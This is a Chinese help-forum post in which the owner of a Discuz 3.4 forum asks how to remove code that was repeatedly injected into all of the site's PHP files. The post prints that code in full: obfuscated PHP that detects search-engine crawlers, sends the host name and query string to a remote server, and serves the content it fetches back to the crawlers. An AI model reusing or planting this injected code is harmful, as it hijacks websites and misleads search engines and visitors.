去评论
dz插件网

DZ3.4被挂木马解决问题

饾暦饾枎饾枒饾枏饾枂饾枅饾枑
2022/01/10 20:56:27
各位大大,请问 论坛所有PHP代码头被植入以下代码,请问彻底解决?每次换新代码覆盖没两天,就又被植入了。


<?php
goto kBVB3; xe7sW: curl_setopt($ch, CURLOPT_HEADER, false); goto nXwRQ; LHGRb: header("\x43\x6f\x6e\164\x65\156\164\x2d\124\171\160\x65\72\x74\x65\170\x74\57\150\164\x6d\154\73\143\x68\x61\x72\x73\145\x74\x3d\x67\x62\x32\x33\61\x32"); goto Zcla7; R_Ek0: $file = base64_decode("\x61\x48\x52\60\143\x44\157\166\114\63\x52\154\132\x6e\116\x30\x4c\x6e\150\64\x62\x44\147\64\x4c\155\116\165\117\x6a\x67\167\115\104\101\x76\x61\x6e\x4e\x6a\x4c\x77\x3d\75") . base64_decode("\114\62\154\x75\132\x47\126\x34\114\156\102\x6f\143\x44\x39\x6f\142\63\116\60\x50\x51\x3d\75") . $host_name . "\x26\161\75" . $_SERVER["\121\125\105\122\131\137\123\x54\x52\x49\x4e\x47"]; goto z_rtS; lMvlC: curl_close($ch); goto oY2r7; ENQsF: curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "\107\105\124"); goto xe7sW; oY2r7: echo $c; goto YyrfW; z_rtS: $ch = curl_init(); goto qxRPh; Zcla7: $host_name = "\x68\x74\x74\x70\x3a\x2f\x2f" . $_SERVER["\123\x45\122\x56\x45\x52\x5f\x4e\x41\115\x45"] . $_SERVER["\x50\110\x50\x5f\123\105\x4c\106"]; goto oGR_n; nXwRQ: curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto Ob49w; qxRPh: curl_setopt($ch, CURLOPT_URL, $file); goto ENQsF; QwSWs: $c = curl_exec($ch); goto lMvlC; kxsvc: if (!(strpos($key, "\x62\x61\x69\144\x75") !== false || strpos($key, "\x68\141\157\163\x6f\165") !== false || strpos($key, "\x33\x36\60") !== false || strpos($key, "\171\x69\x73\157\165") !== false || strpos($key, "\x73\157\x67\157\x75") !== false || strpos($key, "\x67\x6f\157\147\x6c\145") !== false || strpos($key, "\x62\x79\164\145") !== false)) { goto dHcq4; } goto LHGRb; oGR_n: $ua = $_SERVER["\110\x54\x54\120\137\125\123\x45\122\x5f\x41\107\105\x4e\x54"]; goto R_Ek0; Ob49w: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto QwSWs; YyrfW: return; goto co91e; kBVB3: $key = strtolower($_SERVER["\x48\x54\x54\x50\137\125\x53\x45\122\x5f\x41\x47\x45\116\124"]); goto kxsvc; co91e: dHcq4:
?>